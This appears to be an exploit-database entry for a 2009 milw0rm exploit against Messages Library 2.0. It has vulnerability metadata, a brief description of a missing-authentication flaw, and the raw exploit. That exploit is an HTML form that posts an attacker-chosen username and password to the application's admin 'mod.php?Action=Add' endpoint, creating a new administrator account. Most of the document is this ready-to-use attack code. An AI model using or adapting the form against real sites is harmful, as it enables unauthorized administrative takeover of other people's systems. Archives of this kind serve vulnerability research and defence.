ThE g0bL!N Messages Library 2.0 Remote Add Admintsrator Account

vendor:

Messages Library

by:

milw0rm.com

9,3

CVSS

HIGH

Remote Code Execution

287

CWE

Product Name: Messages Library

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

ThE g0bL!N Messages Library 2.0 Remote Add Admintsrator Account

A vulnerability exists in ThE g0bL!N Messages Library 2.0 which allows an attacker to remotely add an administrator account. This is due to a lack of authentication when adding an administrator account. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the vulnerable application. This will allow the attacker to add an administrator account with the credentials of their choice.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

<head>
<title>ThE g0bL!N  Messages Library 2.0 Remote Add Admintsrator Account </title>
<base target="left">
<link rel="stylesheet" href="style.css">
</head>
<form method="POST" action="http://path/sms/admin/mod.php?Action=Add">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
    <tr>
      <td width="25%"><font face="MS Sans Serif" size="2">Username</font></td>
      <td width="75%">&nbsp;<input type="text" name="Name" size="57"></td>
    </tr>
    <tr>
      <td width="25%"><font face="MS Sans Serif" size="2">Password</font></td>
      <td width="75%">&nbsp;<input type="password" name="Password" size="57"></td>
    </tr>
  </table>
  <p align="center"><input type="submit" value="add admin" name="B1"></p>
</form>
</body>
</html>

# milw0rm.com [2009-06-30]